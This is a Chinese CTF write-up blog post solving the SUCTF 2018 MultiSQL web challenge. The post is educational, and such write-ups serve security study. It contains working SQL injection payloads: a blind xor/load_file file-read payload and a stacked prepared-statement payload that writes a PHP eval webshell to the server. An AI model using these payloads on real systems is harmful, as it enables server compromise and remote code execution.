[SUCTF 2018]MultiSQL

于 2024-08-12 16:32:45 发布
阅读量291 收藏 5
点赞数 4
分类专栏: buu 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64849639/article/details/141134096
版权

1、打开环境,右键看源代码:

发现网站存在登录与注册功能

2、登录:

注册:

 3、测试登录注册功能时,发现存在二次注入漏洞:
注册用户名:admin'#:


 发现单引号被转义了,退出从登录界面登录:

 可以发现单引号没被转义了;点击用户信息:

发现直接跳转到admin这里来了,但是此处二次注入利用不了,waf太强了 

4、测试user.php文件提交的数据id,发现存在越权访问:

通过异或:

id=0^if(ascii(mid((user()),1))>0,1,0)

发现测试成功,此处存在布尔盲注,但是过滤了很多东西;

我们用脚本读一些东西:

 首先读取user():

suctf@localhost

尝试一下load_file尝试之后,发现是可以读取成功的:

id=0^if(ascii(mid(load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870),1))>0,1,0)

这里转为十六进制,是因为转义单引号

同样通过脚本读取:

user.php:

<?php include_once('../bwvs_config/sys_config.php');
if(isset($_SESSION['user_name']))
{include_once('../header.php');
if( isset($SESSION['user_id']))
{
$sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_name="."'{$_SESSION['user_name']}'";
$data=mysqli_query($connect,$sql) or die('Mysql Error  ');
$result = mysqli_fetch_array($data);
$_SESSION['user_id'] = $result['DWVS_user_id'];  }
$html_avatar = htmlspecialchars($_SESSION['user_favicon']);
if(isset($_GET['id'])){
$id=waf($_GET['id']);
$sql = "SELECT * FROM dwvs_user_message WHERE DWVS_user_id =".$id;
$data = mysqli_multi_query($connect,$sql) or die();
$result = mysqli_store_result($connect);
$row = mysqli_fetch_row($result);
echo '<h1>user_id:'.$row[0]."</h1><br><h2>user_name:".$row[1]."</h2><br><h3>".$row[4]."</h3>

mysqli_multi_query()这里发现是存在堆叠注入的 

读取/bwvs_config/sys_config.php文件,发现waf.php:

<?php   
function waf($str){   
$black_str = "/(and|or|union|sleep|select|substr|order|left|right|order|by|where|rand|exp|updatexml|insert|update|dorp|delete|[|]|[&])/i";   
$str = preg_replace($black_str, "@@",$str);   
return addslashes($str);  }   
?>

 5、接下来采用MYSQL预处理:

因为我们要写shell,必须要用单引号,通过预处理可以绕过转义单引号:因为前面通过修改头像发现/favicon目录有写权限:

select '<?php eval($_POST['x']);?>' into outfile '/var/www/html/favicon/a.php'转为十六进制

0x73656c65637420273c3f706870206576616c28245f504f53545b315d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f612e70687027

payload:

 id=2;set @xx=0x73656c65637420273c3f706870206576616c28245f504f53545b315d293b3f3e2720696e746f206f757466696c6520272f7661722f7777772f68746d6c2f66617669636f6e2f612e70687027;prepare x from @xx;execute x;

 

xxsxss
关注
专栏目录
_PE_Format.pdf
03-26
根据提供的文件信息,我们可以推断出这份文档主要讨论的是便携式可执行文件格式(Portable Executable File Format,简称 PE 文件格式),并且是从逆向工程的角度进行探讨的。接下来,我们将详细解读并提取该文件中...
[SUCTF 2018]MultiSQL(预处理)
qq_62046696的博客
12-31 1033
通过命令获得flag ,可能是我做题少吧,第一次 看见sql中采用预处理然后写入webshell,最后得flag,反过来分析,通过上传文件给了一个可读写权限得路径,一步步收集信息,只能说自己太菜了。wp是通过盲注,然后一个个读取user.php的源码,我简单的跑了一下半个小时也跑不出来,所以我觉得这种方法并不太实用。异或可以然后试试,发现呃呃呃应该是过滤了,fuzz发现就剩了几个符号包括分号,想到了堆叠注入分号链接。为什么有写入权限呢,因为文件上传都是传到了这个目录的里面,所以有可写的权限。
BUUCTF:[SUCTF 2018]MultiSQL
末初的CSDN博客
04-01 2408
BUUCTF:[SUCTF 2018]MultiSQL 两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell 二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息 ?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入 ...
[SUCTF 2018]MultiSQL MYSQL 预处理写
最新发布
m0_64180167的博客
12-13 829
然后我们开始fuzz 发现 select ,union 都没了。首先这道题需要预处理写马 之前在ctfshow中学习过预处理。发现可以闭合 所以这里是存在堆叠注入的。这里就实现了绕过 并且执行了命令。首先我们开始判断是否存在注入。所以我们看看能不能写木马。
buu-[SUCTF 2018]MultiSQL
qaq517384的博客
10-23 276
打开环境,只有登录和注册界面,admin已存在,随便注册一个算了 登录后有两个选项 头像界面就是一个文件上传,象征性的传一张,得到一个文件夹,可以正常访问 用户信息界面还有url的user/user.php?id=2 很明显的sql注入(如果考点是注入的话) 看一眼题目,然后默默的吧id改成1,能看到admin但是没有用 测了一下字符型和整形注入都没回显 脚本不知道为什么没有返回值,浏览器是能成功访问的 ?id=1^(ascii(mid(user(),1,1))>0) 就手注了一下user()是
[SUCTF 2018]MultiSQL-MySQL预处理
qq_61142406的博客
05-26 286
MySQL传统处理: 客户端准备sql语句 发送sql语句到MySQL服务器 MySQL服务器执行sql语句 服务器执行结果返回客户端 预处理基本策略: 将sql语句强制一分为二: 第一部分为前面相同命令和结构部分 第二部分为后面可变数据部分 首先将前面的sql语句发送给MySQL服务器,让其先执行溢出预处理(并没有真正的执行)第一次发送sql语句的时候将其中可变的数据部分都用一个数据占位符来表示,比如问号? 不带参数的预处理 准备预处理语句 prepare 语句名称 from “预处理的sql
[SUCTF 2018]MultiSQL(mysql预编译)
paidx0
07-12 395
[SUCTF 2018]MultiSQL(mysql预编译)
BUUCTF:[SUCTF 2018]MultiSQL --- 堆叠注入 -- 预处理-- 编码,10进制,16进制。
Zero_Adam的博客
04-17 728
目录:一、自己做:二、 学到的&&不足:三、学习WP:堆叠注入, 参考:初末 一、自己做: 这里试addslash来的 用户信息中,把反斜线去掉展示的 在注册的用户名进行测试, 将 or , by 空格| 替换成为@。 union select or 都过滤了 ,然后在尝试 异或^ substr也被过滤了,然后尝试mid试可以的, 但是这个不好使啊2^(if(ascii(mid(user(),1,1))>0,0,1))。注册页面不好使,然后就看WP了 二、 学到的&&am
[SUCTF 2018]MultiSQL-MySQL预处理学习
cjdgg的博客
05-11 428
[SUCTF 2018]MultiSQL-MySQL预处理学习 进入题目后,注册账户登录 编辑头像可以上传文件,但是上传了php文件还是会变成jpg格式 再看用户信息这里,id=2那里可以随意更改,存在越权,1就是admin 这里接下来要用到MySQL的预处理,参考文章 set MariaDB [(none)]> set @a='select version()'; Query OK, 0 rows affected (0.00 sec) MariaDB [(none)]> select
Stacked Queries(堆叠注入)
qq_45521281的博客
03-28 4183
文章目录基本知识原理介绍:堆叠注入的局限性Mysql数据库实例介绍CTF 实战与各种姿势修改表名利用HANDLER语句利用MySql预处理正常利用MySql预处理配合十六进制绕过关键字MySql预处理配合字符串拼接绕过关键字 Stacked injection 汉语翻译过来后,国内有的称为堆查询注入,也有称之为堆叠注入。个人认为称之为堆叠注入更为准确。堆叠注入为攻击者提供了很多的攻击手段,通过添加一个新的查询或者终止查询( ; ),可以达到 修改数据 和 调用存储过程 的目的。这种技术在SQL注入中还是比较
[原题复现]SUCTF 2019 WEB EasySQL(堆叠注入)
笑花大王
02-09 907
简介 原题复现: 1 <?php 2 session_start(); 3 4 include_once "config.php"; 5 6 $post = array(); 7 $get = array(); 8 global $MysqlLink; 9 10 //GetPara(); 11 $...
BUUCTF:我吃三明治
末初的CSDN博客
04-01 4748
我吃三明治 EXIF没有任何有用信息,binwalk查看的时候发现这是两张图拼起来的 使用winhex打开的时候在两张图片的拼接处发现了一串类似base32的密文 flag{6f1797d4080b29b64da5897780463e30} ...
BUUCTF:[SUCTF2018]single dog
末初的CSDN博客
11-03 2396
题目地址:https://buuoj.cn/challenges#[SUCTF2018]single%20dog attachment.jpg binwalk分析,foremost分离 aaencode编码 AAEncode:http://www.atoolbox.net/Tool.php?Id=703 flag{happy double eleven}
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 6万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
BUUCTF--[SUCTF 2018]MultiSQL
qq_46263951的博客
07-28 414
进入之后是这样的页面,我们先来注册一个帐号 查看用户信息 在?id=后存在一个sql盲注,我们来尝试一下?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2 经过fuzz测试后发现这里过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句select '<?php eval($_POST[.
2018SUCTF部分wp
Risker
05-28 2972
趁大佬都去打别的比赛,试了试SUCTF,依旧菜的一批,只做出来两道,GG。WEB:Anonymous:简单粗暴给源码,看着这源码好像在哪看过:没错,2017HITCON改的,只不过难度降低了一大截..把有难度的部分都去掉了。wp参考这里按照步骤操作,这道题只需要做最后的步骤,只考了个匿名函数以及apache的Pre-fork模式默认工作模式。拿了orange大大的脚本改个host就去跑吧,linu...
[suctf 2019]EasySQL
09-12
[suctf 2019]EasySQL是一个SQL题目,与引用和引用中提到的设置sql_mode有关。具体来说,题目中使用了设置sql_mode=PIPES_AS_CONCAT的语句,这个设置的作用是将"||"操作符解释为字符串的连接操作符而不是或运算符。这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值